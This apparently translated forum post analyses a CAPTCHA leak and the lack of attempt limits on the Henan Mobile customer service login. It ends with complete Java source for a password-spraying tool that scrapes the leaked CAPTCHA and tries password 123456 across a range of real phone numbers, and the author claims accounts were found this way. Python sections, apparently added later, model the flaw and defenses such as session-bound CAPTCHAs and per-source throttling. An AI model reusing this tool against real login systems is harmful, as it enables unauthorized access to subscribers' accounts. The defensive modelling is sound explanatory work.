Analysis of the CAPTCHA flaw in the Henan Mobile online customer service system and how it can be exploited

Source: Internet
Author: User
First of all, there is nothing technically deep in this article; it only shows that Java can also be used as a cracking tool.

Everyone is familiar with China Mobile's online customer service system; since I am a loyal Henan Mobile user, I will naturally talk about Henan Mobile. Anyone who has handled business in a mobile service hall knows that the user's service password can only be set to six digits from 0 to 9. Because the online service system is synchronized with the mobile core database, its password is also limited to six digits. Such a small password space is ideal for brute-force cracking.
Let's analyze the feasibility of brute force. First, the system places no limit on the number of login attempts: I entered random phone numbers to test its tolerance, tried ten times, and still got the login page back (yes~). Next, analyze the key fields that the login submits. Take a look at the login page http://khfw.ha.chinamobile.com/new_wskf/login/login_portal.jsp
__________________________________________
.....................
<form method="POST" name="thisform"
    Data is submitted with the POST method
...........
action="/servlet/com.huawei.icd30.wskf.login.LoginCheck">
    The servlet that handles the login event; below are the parameters it receives
<input type="hidden" name="forwardflag" value="0">
    Key field forwardflag: purpose unknown, but it does not change when the page is refreshed
<input type="hidden" name="transaction" value="3">
    Key field transaction: same as above
<input type="hidden" name="ssrandompass" value="dnzjn/vfr4hwmacdvqhncq==">
    Key field ssrandompass: a new random value on every refresh, never displayed on the page;
    possibly an implicit identity token
......................
The following are the fields the user fills in:
<td><input type="text" name="username" size="14"
    The mobile phone number
<td><input type="password" name="password"
    The phone (service) password
<td><input name="randompassword" type="text"
    The picture verification code (CAPTCHA)
.......................................
___________________________________


Putting it together, the POST body is: forwardflag=0&transaction=3&ssrandompass=dnzjn/vfr4hwmacdvqhncq==&username=135********&password=******&randompassword=****

The password is what we want to guess, so the key is how to pin down randompassword (the CAPTCHA), that is, how to read the value in the verification image. It is worth mentioning that in the days before CAPTCHAs, brute-force cracking software was very popular and was a very effective way into most mail servers and forums; it made a batch of classic cracking tools famous, such as Fluxay (流光) and Suxue (溯雪). (Hehe, all treasures worth collecting.)
Let's take a look at how the CAPTCHA is generated: right-click the CAPTCHA image. Haha, what do we see? http://khfw.ha.chinamobile.com/s ... let?randompass=9814 <-- isn't this exactly our verification code value?
We requested the com.huawei.icd30.wskf.console.ImageServlet application with randompass changed to 1111 and, as expected, it generated a picture showing 1111. This shows that the login verifier and the CAPTCHA generator are two separate applications: the login page that comes back passes the value as a parameter, and ImageServlet simply renders whatever it is given.
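To make the design flaw concrete, here is an added Python model, not code from the page and not the real servlets, of the two designs side by side: the one the article observed, where the login page hands the expected value to ImageServlet as a plain randompass parameter, and a hardened one where the code stays in server-side session state, the image URL carries only an opaque nonce, and the code is spent on the first attempt. The Session class, the nonce parameter n and the simulated "[image:...]" output are assumptions made for the model; how the real LoginCheck verifies randompassword, and what ssrandompass carries, is not stated on the page.

```python
import hmac
import re
import secrets


class Session:
    """Server-side session store for one client (constructed for this example)."""

    def __init__(self):
        self.data = {}


def vulnerable_login_page(session):
    """Models the page as the article observes it: the expected CAPTCHA value is
    passed to the image servlet as a plain query parameter, so anyone who fetches
    the page can read it without looking at the picture."""
    code = f"{secrets.randbelow(10000):04d}"
    session.data["captcha"] = code
    return (
        '<form method="POST" action="/servlet/com.huawei.icd30.wskf.login.LoginCheck">\n'
        '<input type="hidden" name="forwardflag" value="0">\n'
        '<input type="hidden" name="transaction" value="3">\n'
        f'<img src="/servlet/com.huawei.icd30.wskf.console.ImageServlet?randompass={code}">\n'
        '<input name="randompassword" type="text">\n'
        '</form>\n'
    )


def vulnerable_image_servlet(randompass):
    """Renders whatever it is given: the article shows randompass=1111 yields a picture of 1111."""
    return f"[image:{randompass}]"


def hardened_login_page(session):
    """Same form, but the code never leaves the server: the image URL carries only
    an opaque nonce (assumed parameter name n) that the image servlet resolves
    against the session."""
    session.data["captcha"] = f"{secrets.randbelow(10000):04d}"
    session.data["captcha_used"] = False
    session.data["captcha_nonce"] = secrets.token_urlsafe(16)
    return (
        '<form method="POST" action="/servlet/com.huawei.icd30.wskf.login.LoginCheck">\n'
        '<input type="hidden" name="forwardflag" value="0">\n'
        '<input type="hidden" name="transaction" value="3">\n'
        f'<img src="/servlet/com.huawei.icd30.wskf.console.ImageServlet?n={session.data["captcha_nonce"]}">\n'
        '<input name="randompassword" type="text">\n'
        '</form>\n'
    )


def hardened_image_servlet(session, nonce):
    """Only renders the code bound to this session, and only for the nonce issued with the form."""
    if not hmac.compare_digest(nonce, session.data.get("captcha_nonce", "")):
        return "[image:refused]"
    return f"[image:{session.data['captcha']}]"


def extract_code_from_page(html):
    """What the article's tool does with fixed charAt offsets, done with a regex
    instead: returns the CAPTCHA value leaked in the image URL, or None."""
    m = re.search(r'ImageServlet\?randompass=(\d{4})', html)
    return m.group(1) if m else None


def extract_nonce_from_page(html):
    m = re.search(r'ImageServlet\?n=([A-Za-z0-9_-]+)', html)
    return m.group(1) if m else None


def login_check(session, submitted, single_use):
    """Verifier: compares the submitted randompassword with the session's code.
    With single_use=True the code is spent on the first attempt, right or wrong,
    so one leaked or solved value cannot be replayed across many password guesses."""
    expected = session.data.get("captcha")
    if expected is None:
        return False
    if single_use and session.data.get("captcha_used"):
        return False
    if single_use:
        session.data["captcha_used"] = True
    return hmac.compare_digest(submitted, expected)
```

The lesson is that the generator and the verifier must share the expected value through state the client cannot read (or through an authenticated, encrypted token it cannot decode), never through a parameter the client can see or supply. extract_code_from_page also shows a more robust way to scrape the field than the fixed charAt offsets the Java tool on this page uses, which break on any change to the page layout.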

That completes the analysis. Turning it into a brute-force program is not technically difficult. I wrote a Java version and tested it successfully under Win2000. Imitating the mode of some QQ cracking tools, it keeps the password fixed at 123456 and keeps changing the phone number being guessed; within 10 minutes it found a user whose password was 123456.
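The two observations that make the attack work, no limit on attempts (noted above) and one fixed password walked across many phone numbers, can be checked against a small login model. This is an added Python example, not the article's tool and not the real system: the accounts, the number prefix 13500, the passwords, the source address and the limits are all constructed here. It shows why a per-account lockout, the usual answer to brute force, does nothing against the article's mode, while a per-source throttle stops it.

```python
from collections import Counter

PASSWORD_SPACE = 10 ** 6  # six digits, 0-9 each, as the article states


class LoginService:
    """Constructed model of a login endpoint with an optional per-account lockout
    and an optional per-source throttle (not the real customer service system)."""

    def __init__(self, accounts, per_account_limit=None, per_source_limit=None):
        self.accounts = dict(accounts)        # phone number -> six-digit password
        self.per_account_limit = per_account_limit
        self.per_source_limit = per_source_limit
        self.account_failures = Counter()
        self.source_attempts = Counter()

    def login(self, source_ip, username, password):
        self.source_attempts[source_ip] += 1
        if self.per_source_limit is not None and self.source_attempts[source_ip] > self.per_source_limit:
            return "throttled"
        if self.per_account_limit is not None and self.account_failures[username] >= self.per_account_limit:
            return "locked"
        if self.accounts.get(username) == password:
            return "ok"
        self.account_failures[username] += 1
        return "fail"


def build_accounts(n=2000):
    """Constructed user base: numbers 13500xxxxx with a deterministic password
    each (never 123456), plus three users who chose 123456."""
    accounts = {f"13500{i:05d}": f"{i:06d}" for i in range(n)}
    for weak in (17, 333, 1500):
        accounts[f"13500{weak:05d}"] = "123456"
    return accounts


def spray(service, source_ip, prefix, password, start, stop):
    """The article's mode: one fixed password, walk the five-digit number tail.
    Returns the numbers that accepted the password and a count of each outcome."""
    hits, outcomes = [], Counter()
    for tail in range(start, stop):
        username = f"{prefix}{tail:05d}"
        result = service.login(source_ip, username, password)
        outcomes[result] += 1
        if result == "ok":
            hits.append(username)
        if result == "throttled":
            break
    return hits, outcomes


def brute_force_one(service, source_ip, username, max_attempts):
    """The classic mode: one account, walk the password space upward from 000000."""
    outcomes = Counter()
    for guess in range(max_attempts):
        result = service.login(source_ip, username, f"{guess:06d}")
        outcomes[result] += 1
        if result == "ok":
            return f"{guess:06d}", outcomes
    return None, outcomes


def hours_to_exhaust(attempts_per_second, keyspace=PASSWORD_SPACE):
    """Worst-case time to walk the whole password space at a given attempt rate."""
    return keyspace / attempts_per_second / 3600
```

With only a per-account lockout, the spray touches every account exactly once, so no account ever locks and every 123456 user is found; the single-account brute force is what the lockout actually stops. A per-source attempt limit cuts the spray off after its budget, which is why detection should count attempts and distinct usernames per source, not just failures per account. Even a modest 10 attempts per second empties a six-digit space in under 28 hours, so the space itself, not the lockout, is the weak point.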


This code is for research only; I take no responsibility for any consequences of using it. ********


The source code is as follows:
--------------

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.OutputStreamWriter;
import java.net.URL;
import java.net.URLConnection;

public class Result {

    // Key fields scraped from the login page before every attempt
    public static String ssrandompass, randompassword;
    // Six-digit phone password (kept fixed at 123456) and the five-digit tail of the phone number
    public static int password = 123456, num = 0;
    // The phone number is PREFIX followed by the zero-padded five-digit tail
    public static final String PREFIX = "135286";

    public static void main(String[] args) {
        while (true) {
            check(); // fetch the login page and capture its key fields

            String phone = PREFIX + String.format("%05d", num);
            try {
                URL url = new URL("http://khfw.ha.chinamobile.com/servlet/com.huawei.icd30.wskf.login.LoginCheck");
                URLConnection connection = url.openConnection();
                connection.setDoOutput(true);

                OutputStreamWriter out = new OutputStreamWriter(connection.getOutputStream(), "ISO-8859-1");
                // Assemble the POST body from the captured fields and the current guess
                out.write("forwardflag=0&transaction=3&ssrandompass=" + ssrandompass
                        + "&username=" + phone
                        + "&password=" + password
                        + "&randompassword=" + randompassword);
                out.flush();
                out.close();

                // Read back the response; its body is what tells success from failure
                BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));
                String line;
                StringBuffer content = new StringBuffer();
                while ((line = in.readLine()) != null) {
                    content.append(line);
                }
                in.close();
                String msg = content.toString();

                System.err.println("Back Code:" + msg.length() + " Check passwd:" + password);
                System.err.println("Check num:" + phone);
                // The author's success test is the response length (412 bytes); 99999 means the range is exhausted
                if (msg.length() == 412 || num == 99999) {
                    System.err.println("Get one PhoneNumber");
                    System.err.println(msg);
                    break;
                }
                // The password stays fixed; only the phone number changes (the mode described above)
                num++;
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }

    // Fetches the login page and captures ssrandompass and the CAPTCHA value
    public static void check() {
        StringBuffer ssr = new StringBuffer();
        StringBuffer rand = new StringBuffer();
        try {
            URL url = new URL("http://khfw.ha.chinamobile.com/new_wskf/login/login_portal.jsp");
            URLConnection connection = url.openConnection();

            BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));
            String line;
            StringBuffer content = new StringBuffer();
            while ((line = in.readLine()) != null) {
                content.append(line);
            }
            in.close();
            String msg = content.toString();

            // The 24-character ssrandompass value sits at a fixed offset in the page source
            // (fixed offsets break as soon as the page layout changes)
            for (int i = 0; i <= 23; i++) {
                ssr.append(msg.charAt(1534 + i));
            }
            ssrandompass = ssr.toString();
            System.err.println(ssr.toString());

            // The four-digit CAPTCHA value, passed to ImageServlet as randompass=, sits at another fixed offset
            for (int i = 0; i <= 3; i++) {
                rand.append(msg.charAt(2492 + i));
            }
            randompassword = rand.toString();
            System.err.println(rand.toString());

            System.err.println(msg);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
